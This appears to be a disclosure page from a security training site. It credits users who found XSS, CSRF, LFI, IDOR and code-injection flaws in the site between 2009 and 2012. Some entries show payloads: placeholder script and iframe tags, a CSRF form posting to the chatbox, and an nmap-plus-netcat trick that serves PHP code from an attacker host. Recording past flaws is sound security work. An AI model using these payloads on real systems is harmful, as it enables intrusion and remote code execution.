As with any information system, some weaknesses have been identified on the website.

- [02/12/2009] real found a code injection vulnerability:


- [02/02/2011] hello found several stored XSS in the PM system:

<script>[code javascript/vbscript]</script>

- [15/02/2011] essandre found an LFI:


- [30/06/2011] elyfean found a CSRF on the chatbox:

<form id="form" action="http://www.root-me.org/?lang=fr" method="post">
<input type="hidden" name="ON" value="1">
<input type="hidden" name="message" value="0wn3d !">
</form>

- [11/07/2011] Armel found a stored XSS on the chatbox:

<iframe src="javascript:[code javascript]"></iframe>

- [18/07/2011] g0uZ found a PHP code injection vulnerability on the "online tools: nmap" page:

Host to scan in -sV mode:

--version-trace -p8888 [IP server attacker]

Service listening on the attacker's server:

i=0; while [ $i -lt 5 ]; do nc -v -l -p 8888 -e '<?php [CODE PHP];?>'; i=$(( $i+1 )); done

- [02/10/2011] Hypnoze57 found an insecure direct object reference which led to unauthorized access to all PMs:


- [23/10/2011] courte66 found a reflected XSS in the "encode - decode" page:

Text to decode in base64:


- [20/03/2012] jimee found an LFI in the realistic challenge 9:


- [06/11/2012] crown found several stored XSS in the user profile management:

<script>[code javascript/vbscript]</script>